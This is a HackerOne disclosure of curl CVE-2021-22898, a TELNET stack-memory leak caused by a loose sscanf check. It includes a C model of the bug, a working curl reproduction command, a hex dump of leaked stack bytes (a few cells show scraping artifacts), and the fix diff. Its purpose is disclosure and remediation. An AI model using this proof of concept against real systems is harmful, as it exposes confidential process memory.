HackerOne report H1:1176461 by nyymi
Apr 27, 2021 - 9:49 a.m.

curl: CVE-2021-22898: TELNET stack contents disclosure

Reported 2021-04-27 09:49:43 by nyymi on hackerone.com; bounty: $1000
8

CVSS3: 3.1 Low (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N)
  Attack Vector: NETWORK; Attack Complexity: HIGH; Privileges Required: NONE; User Interaction: REQUIRED; Scope: UNCHANGED; Confidentiality Impact: LOW; Integrity Impact: NONE; Availability Impact: NONE

CVSS2: 2.6 Low (AV:N/AC:H/Au:N/C:P/I:N/A:N)
  Access Vector: NETWORK; Access Complexity: HIGH; Authentication: NONE; Confidentiality Impact: PARTIAL; Integrity Impact: NONE; Availability Impact: NONE

EPSS: 0.002 Low (Percentile 51.9%)

Summary:

The suboption function in lib/telnet.c incorrectly checks the return value of sscanf. Instead of requiring that both elements were parsed, the code also continues when only one element matches:

    if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {

As a result it is possible to construct environment values that don't update the varval buffer, so the previous value is used instead. Combined with the write position in the temp buffer being advanced by strlen(v->data) + 1 regardless, this leaves uninitialized gaps in the output generated in the temp buffer. Those gaps contain whatever the stack held from the application's earlier operations.

Fortunately the environment is controlled by the client and not the server, so this vulnerability can't be exploited by the server. Practical exploitation is limited by the following requirements:

  • the attacker is able to control the environment passed to libcurl via CURLOPT_TELNETOPTIONS (“NEW_ENV=xxx,yyy”), i.e. control xxx and yyy in the curl_slist entries
  • the attacker is able either to inspect the network traffic of the telnet connection or to select the server/port the connection is established to

When both are true the attacker is able to read some content of the stack. Note however that for this leak to be meaningful, some confidential or sensitive information would need to be present on the stack. That could happen if a key or other sensitive material that is otherwise out of the attacker's reach (for example because of setuid followed by dropping privileges, or because the attacker can only execute the command remotely in a limited fashion, such as through PHP's curl binding) becomes fully or partially visible. The leak is limited to at most about half of the 2048 byte temp buffer.
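The vulnerable check beside the hardened one, as an added C model written for this page (not curl's own code): build_new_env() mimics the NEW_ENV loop, and demo_gap_bytes() feeds it a constructed entry whose name exceeds the 127-character field width, the same shape as the PoC below. It assumes that a complete fix also advances len only for entries that were actually written, which the one-line hunk in the Fix section does not show.

```c
#include <stdio.h>
#include <string.h>
#define NEW_ENV_VAR   0
#define NEW_ENV_VALUE 1
#define TEMP_SIZE     2048

/* Constructed model of the NEW_ENV loop in suboption(); not curl's own code.
 * strict=0 keeps the vulnerable truthiness check; strict=1 requires both fields
 * and (an assumption about a complete fix) advances len only for written entries. */
size_t build_new_env(const char *const *entries, size_t n, int strict,
                     unsigned char *temp)
{
  char varname[128] = "", varval[128] = "";  /* persist across iterations */
  size_t len = 0;
  for(size_t i = 0; i < n; i++) {
    size_t tmplen = strlen(entries[i]) + 1;
    if(len + tmplen >= TEMP_SIZE - 6)
      break;
    int matched = sscanf(entries[i], "%127[^,],%127s", varname, varval);
    if(strict ? matched == 2 : matched != 0) {
      snprintf((char *)&temp[len], TEMP_SIZE - len, "%c%s%c%s",
               NEW_ENV_VAR, varname, NEW_ENV_VALUE, varval);
      if(strict)
        len += tmplen;
    }
    if(!strict)
      len += tmplen;  /* vulnerable: advanced even when nothing was written */
  }
  return len;
}

static int last_stale;  /* set by demo_gap_bytes(), read by demo_stale_value() */
/* Constructed input like the report's PoC: a well-formed entry, then one whose
 * name exceeds the 127-char field width so sscanf stops after varname.
 * Returns how many payload bytes were never written (0xAA sentinel survives). */
size_t demo_gap_bytes(int strict)
{
  char longent[258];
  memset(longent, 'a', 257);
  longent[128] = ','; longent[257] = '\0';
  const char *entries[2] = { "USER,alice", longent };
  unsigned char temp[TEMP_SIZE]; memset(temp, 0xAA, sizeof(temp));
  size_t len = build_new_env(entries, 2, strict, temp), gaps = 0;
  for(size_t i = 0; i < len; i++)
    gaps += (temp[i] == 0xAA);
  /* second entry's value starts at 11 + marker(1) + name(127) + marker(1) */
  last_stale = len > 145 && memcmp(&temp[140], "alice", 5) == 0;
  return gaps;
}
int demo_stale_value(void) { return last_stale; }
```

With the vulnerable check the second entry goes out carrying the first entry's value and 123 bytes of the payload are never written, which in the real client is where stack contents appear; with the strict check the entry is dropped and no gap remains.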

Steps To Reproduce:

  1. Run a telnet service
  2. tcpdump -i lo -X -s 65535 port 23
  3. Execute:
curl -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -tNEW_ENV=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa telnet://127.0.0.1 <<< foo

You’ll see something like:

        0x0000:  4500 073a 9711 4000 4006 9eaa 7f00 0001  E..:..@.@.......
        0x0010:  7f00 0001 c79c 0017 f499 4092 2173 31a0  ..........@.!s1.
        0x0020:  8018 0200 052f 0000 0101 080a d7e7 b666  ...../.........f
        0x0030:  d7e7 b666 fffa 2700 0061 6161 6161 6161  ...f..'..aaaaaaa
        0x0040:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0050:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0060:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0070:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0080:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0090:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x00a0:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x00b0:  6161 6161 6161 6161 0100 0000 0000 0000  aaaaaaaa........
        0x00c0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00d0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00e0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00f0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0100:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0110:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0120:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0130:  0000 0000 0000 0000 0061 6161 6161 6161  .........aaaaaaa
        0x0140:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0150:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0160:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0170:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0180:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0190:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x01a0:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x01b0:  6161 6161 6161 6161 0100 0000 6025 fec0  aaaaaaaa....`%..
        0x01c0:  7c7f 0000 0000 0000 0000 0000 e002 0000  |...............
        0x01d0:  0000 0000 60cd f654 7c55 0000 0088 2975  ....`..T|U....)u
        0x01e0:  780b b94a 0000 0000 0000 0000 c45d b9aa  x..J.........]..
        0x01f0:  fd7f 0000 a05b b9aa fd7f 0000 a05c b9aa  .....[.......\..
        0x0200:  fd7f 0000 2042 f754 7c55 0000 702a f754  .....B.T|U..p*.T
        0x0210:  7c55 0000 0000 0000 0000 0000 148f e7c0  |U..............
        0x0220:  7c7f 0000 3000 0000 3000 0000 505b b9aa  |...0...0...P[..
        0x0230:  fd7f 0000 905a b9aa 0061 6161 6161 6161  .....Z...aaaaaaa
        0x0240:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0250:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0260:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0270:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0280:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0290:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x02a0:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x02b0:  6161 6161 6161 6161 0100 0000 605d b9aa  aaaaaaaa....`]..
        0x02c0:  fd7f 0000 605d b9aa fd7f 0000 695d b9aa  ....`]......i]..
        0x02d0:  fd7f 0000 ffff ffff ffff ffff 605d b9aa  ............`]..
        0x02e0:  fd7f 0000 ffff ffff ffff ffff 0000 0000  ................
        0x02f0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0300:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0310:  0000 0000 1000 0000 0000 0000 7413 f1c0  ............t...
        0x0320:  7c7f 0000 0000 b9aa fd7f 0000 0000 0000  |...............
        0x0330:  0000 0000 1000 0000 0061 6161 6161 6161  .........aaaaaaa
        0x0340:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0350:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0360:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0370:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0380:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0390:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x03a0:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x03b0:  6161 6161 6161 6161 0100 0000 e82e f754  aaaaaaaa.......T
        0x03c0:  7c55 0000 0000 0000 0000 0000 702a f754  |U..........p*.T
        0x03d0:  7c55 0000 2042 f754 7c55 0000 148f e7c0  |U...B.T|U......
        0x03e0:  7c7f 0000 3000 0000 3000 0000 105d b9aa  |...0...0....]..
        0x03f0:  fd7f 0000 505c b9aa fd7f 0000 0088 2975  ....P\........)u
        0x0400:  780b b94a c05d b9aa fd7f 0000 2042 f754  x..J.].......B.T
        0x0410:  7c55 0000 7f00 0000 0000 0000 0000 0000  |U..............
        0x0420:  0000 0000 0000 0000 0000 0000 0100 0000  ................
        0x0430:  0000 0000 a47b e2c0 0061 6161 6161 6161  .....{...aaaaaaa
        0x0440:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0450:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0460:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0470:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0480:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0490:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x04a0:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x04b0:  6161 6161 6161 6161 0100 0000 aea3 e7c0  aaaaaaaa........
        0x04c0:  7c7f 0000 1700 0000 0000 0000 1000 0000  |...............
        0x04d0:  3000 0000 005f b9aa fd7f 0000 305e b9aa  0...._......0^..
        0x04e0:  fd7f 0000 0180 adfb fd7f 0000 47f3 f654  ............G..T
        0x04f0:  7c55 0000 49f3 f654 7c55 0000 40f2 f654  |U..I..T|[email protected]
        0x0500:  7c55 0000 40f2 f654 7c55 0000 40f2 f654  |[email protected]|[email protected]
        0x0510:  7c55 0000 40f2 f654 7c55 0000 40f2 f654  |[email protected]|[email protected]
        0x0520:  7c55 0000 49f3 f654 7c55 0000 0000 0000  |U..I..T|U......
        0x0530:  0000 0000 0000 0000 0061 6161 6161 6161  .........aaaaaaa
        0x0540:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0550:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0560:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0570:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0580:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0590:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x05a0:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x05b0:  6161 6161 6161 6161 0100 0000 1f00 0000  aaaaaaaa........
        0x05c0:  0000 0000 3001 0000 0000 0000 0000 0000  ....0...........
        0x05d0:  0000 0000 0200 0000 3000 0000 6e00 0000  ........0...n...
        0x05e0:  7c00 0000 0000 0000 0000 0000 5b00 0000  |...........[...
        0x05f0:  7700 0000 0000 0000 0000 0000 0000 0000  w...............
        0x0600:  0000 0000 8038 f754 7c55 0000 0000 0000  .....8.T|U......
        0x0610:  0000 0000 1000 0000 0000 0000 b0ff ffff  ................
        0x0620:  ffff ffff 805f b9aa fd7f 0000 2042 f754  ....._.......B.T
        0x0630:  7c55 0000 1a21 f954 0061 6161 6161 6161  |U...!.T.aaaaaaa
        0x0640:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0650:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0660:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0670:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0680:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x0690:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x06a0:  6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
        0x06b0:  6161 6161 6161 6161 0100 5600 0000 0000  aaaaaaaa..V.....
        0x06c0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x06d0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x06e0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x06f0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x0700:  0000 0000 f7f9 bbaa fd7f 0000 0100 0000  ................
        0x0710:  0000 0000 b05f b9aa fd7f 0000 0e5f 07c1  ....._......._..
        0x0720:  7c7f 0000 0100 0000 0000 0000 417b eec0  |...........A{..
        0x0730:  7c7f 0000 6161 6161 fff0                 |...aaaa..

Fix

diff --git a/lib/telnet.c b/lib/telnet.c
index f96a4cb4c..845b59db5 100644
--- a/lib/telnet.c
+++ b/lib/telnet.c
@@ -921,7 +923,7 @@ static void suboption(struct Curl_easy *data)
         size_t tmplen = (strlen(v->data) + 1);
         /* Add the variable only if it fits */
         if(len + tmplen < (int)sizeof(temp)-6) {
-          if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
+          if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
             msnprintf((char *)&temp[len], sizeof(temp) - len,
                       "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
                       CURL_NEW_ENV_VALUE, varval);
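Review bot: the `== 2` check on the `sscanf` line stops a partially matched entry from being emitted with the previous `varval`, but the summary describes `len` being advanced by `tmplen` (`strlen(v->data) + 1`) for every entry, and that advance lies outside this hunk's context. If it stays unconditional, a rejected entry now writes nothing yet still leaves `tmplen` unwritten bytes of `temp` inside the payload sent to the server. Either move `len += tmplen;` inside the `if` so only written entries advance, or zero `temp` before the loop, and add a short comment on the changed line saying why both fields are required.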

Impact

Leak of potentially confidential information.
